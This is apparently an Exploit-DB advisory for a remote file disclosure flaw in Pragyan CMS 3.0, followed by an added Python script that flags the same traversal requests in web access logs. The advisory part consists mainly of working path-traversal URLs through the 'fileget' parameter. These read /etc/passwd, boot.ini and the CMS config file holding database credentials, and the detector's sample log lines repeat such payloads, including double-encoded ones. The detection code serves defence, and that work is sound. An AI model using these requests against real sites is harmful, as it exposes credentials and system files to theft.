Pragyan CMS 3.0 - Remote File Disclosure
Author: Or4nG.M4N
type: webapps
platform: php
port:
date_added: 2012-01-10
date_updated: 2012-01-10
verified: 0
codes: OSVDB-82585;CVE-2012-6500
tags:
aliases:
screenshot_url:
application_url: http://www.exploit-db.comPragyanCMS-v3.0-beta.tar.bz2
Title: Pragyan CMS v 3.0 => [Remote File Disclosure]
Author: Or4nG.M4n
Download: http://space.dl.sourceforge.net/project/pragyan/pragyan/3.0/PragyanCMS-v3.0-beta.tar.bz2
vuln: download.lib.php line 16
vuln: index.php line 234
$_GET['fileget']
exploit: http://localhost/Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../ etc/passwd . boot.ini
Download Config file
exploit: /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../appserv/www/Pragyan/cms/config.inc.php
exploit: /Pragyan/?page=/&action=profile&fileget=../../../../../../../../../../../../home/exploitdb/public_html/Pragyan/cms/config.inc.php
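
A detection check for the requests listed above, added here as an example and not part of the original advisory or of Pragyan CMS: it scans web access-log lines for a fileget value that, after repeated URL-decoding, contains ".." segments or an absolute path. The log lines are constructed, and the combined log format and all function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-format access log entry (format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, rounds=3):
    """Undo nested percent-encoding (%252e -> %2e -> .), bounded to a few rounds."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(value):
    """True if the value climbs directories or names an absolute path."""
    path = fully_decode(value).replace("\\", "/")
    if path.startswith("/") or re.match(r"^[A-Za-z]:/", path):
        return True
    return ".." in path.split("/")

def suspicious_fileget(log_line):
    """Return the decoded fileget value if the request looks like traversal, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    query = urlsplit(m.group(1)).query
    for value in parse_qs(query, keep_blank_values=True).get("fileget", []):
        if is_traversal(value):
            return fully_decode(value)
    return None

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [10/Jan/2012:10:00:01 +0000] "GET /Pragyan/?page=/&action=profile&fileget=avatar.png HTTP/1.1" 200 5120',
    '192.0.2.44 - - [10/Jan/2012:10:00:07 +0000] "GET /Pragyan/?page=/&action=profile&fileget=../../../../cms/config.inc.php HTTP/1.1" 200 912',
    '192.0.2.44 - - [10/Jan/2012:10:00:09 +0000] "GET /Pragyan/?page=/&action=profile&fileget=%252e%252e%252fcms%252fconfig.inc.php HTTP/1.1" 200 912',
    '192.0.2.51 - - [10/Jan/2012:10:01:00 +0000] "GET /Pragyan/?page=/home HTTP/1.1" 200 2048',
]

def scan(lines):
    """Return (line_number, decoded_value) for every flagged request."""
    found = ((n, suspicious_fileget(line)) for n, line in enumerate(lines, 1))
    return [(n, v) for n, v in found if v is not None]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: fileget={value!r}")
```

A 200 response to a flagged request, as in the constructed lines 2 and 3, is the case to escalate, since it suggests the file was actually served.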